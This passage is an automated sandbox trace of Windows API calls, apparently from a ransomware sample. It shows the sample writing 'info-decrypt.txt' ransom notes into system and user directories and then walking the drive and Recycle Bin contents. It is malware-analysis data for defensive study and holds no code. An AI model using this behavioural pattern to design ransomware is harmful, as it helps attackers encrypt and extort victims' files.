dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.250] GetFileType (hFile=0x2d4) returned 0x1 [0093.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.250] GetFileType (hFile=0x2d4) returned 0x1 [0093.251] WriteFile (in: hFile=0x2d4, lpBuffer=0x35207d0*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x35207d0*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.252] CloseHandle (hObject=0x2d4) returned 1 [0093.252] GetFullPathNameW (in: lpFileName="C:\\System Volume Information\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\System Volume Information\\info-decrypt.txt", lpFilePart=0x0) returned 0x2d [0093.252] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.252] CreateFileW (lpFileName="C:\\System Volume Information\\info-decrypt.txt" (normalized: "c:\\system volume information\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0xffffffff [0093.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ed8c0) returned 1 [0093.287] SysReAllocStringLen (in: pbstr=0x6ed8a4*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6ed8a4*="ntdll.dll") returned 1 [0093.287] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0093.287] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0093.287] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.287] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.289] GetFileType (hFile=0x2d4) returned 0x1 [0093.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.289] GetFileType (hFile=0x2d4) returned 0x1 [0093.289] WriteFile (in: hFile=0x2d4, lpBuffer=0x35262a8*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x35262a8*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.290] CloseHandle (hObject=0x2d4) returned 1 [0093.291] GetFullPathNameW (in: lpFileName="C:\\Users\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\info-decrypt.txt", lpFilePart=0x0) returned 0x19 [0093.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.291] CreateFileW (lpFileName="C:\\Users\\info-decrypt.txt" (normalized: "c:\\users\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.291] GetFileType (hFile=0x2d4) returned 0x1 [0093.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.291] GetFileType (hFile=0x2d4) returned 0x1 [0093.291] WriteFile (in: hFile=0x2d4, lpBuffer=0x3528864*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x3528864*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.292] CloseHandle (hObject=0x2d4) returned 1 [0093.293] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.txt", lpFilePart=0x0) returned 0x13 [0093.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.293] CreateFileW (lpFileName="C:\\info-decrypt.txt" (normalized: "c:\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.294] GetFileType (hFile=0x2d4) returned 0x1 [0093.294] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.294] GetFileType (hFile=0x2d4) returned 0x1 [0093.294] WriteFile (in: hFile=0x2d4, lpBuffer=0x352adec*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x352adec*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.295] CloseHandle (hObject=0x2d4) returned 1 [0093.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\info-decrypt.txt", nBufferLength=0x105, lpBuffer=0x6ee594, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\info-decrypt.txt", lpFilePart=0x0) returned 0x1b [0093.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eea88) returned 1 [0093.295] CreateFileW (lpFileName="C:\\Windows\\info-decrypt.txt" (normalized: "c:\\windows\\info-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d4 [0093.295] GetFileType (hFile=0x2d4) returned 0x1 [0093.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eea84) returned 1 [0093.296] GetFileType (hFile=0x2d4) returned 0x1 [0093.296] WriteFile (in: hFile=0x2d4, lpBuffer=0x352d3b4*, nNumberOfBytesToWrite=0x4d2, lpNumberOfBytesWritten=0x6eeb20, lpOverlapped=0x0 | out: lpBuffer=0x352d3b4*, lpNumberOfBytesWritten=0x6eeb20*=0x4d2, lpOverlapped=0x0) returned 1 [0093.296] CloseHandle (hObject=0x2d4) returned 1 [0093.297] GetLogicalDrives () returned 0x4 [0093.297] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee660, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.297] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x6ee67c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eeb6c) returned 1 [0093.297] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x6eebe8 | out: lpFileInformation=0x6eebe8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccb1620, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0093.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb68) returned 1 [0093.297] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee6e4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebb0) returned 1 [0093.297] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee6b8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.297] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x6ee68c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0093.297] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x6ee8d8 | out: lpFindFileData=0x6ee8d8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xb440e8 [0093.298] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0093.298] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0093.298] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0093.298] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0093.298] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0093.299] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0093.299] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccb1620, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccb1620, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0093.299] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0093.299] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0093.299] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0093.300] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0093.300] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0093.300] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0093.300] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfcd49ba0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd49ba0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0093.300] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0093.301] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccfd8e0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccfd8e0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0093.301] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcdbbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0093.301] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.301] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb70) returned 1 [0093.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6eeb7c) returned 1 [0093.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6eebc0) returned 1 [0093.303] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x6ee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0093.303] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\", nBufferLength=0x105, lpBuffer=0x6ee69c, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\", lpFilePart=0x0) returned 0x10 [0093.303] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x6ee8e8 | out: lpFindFileData=0x6ee8e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.304] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.306] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.307] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.307] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0093.307] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0093.307] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0093.307] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.308] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.308] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.308] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfccd7780, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfccd7780, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfccd7780, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0093.308] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0093.309] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0093.309] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.309] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 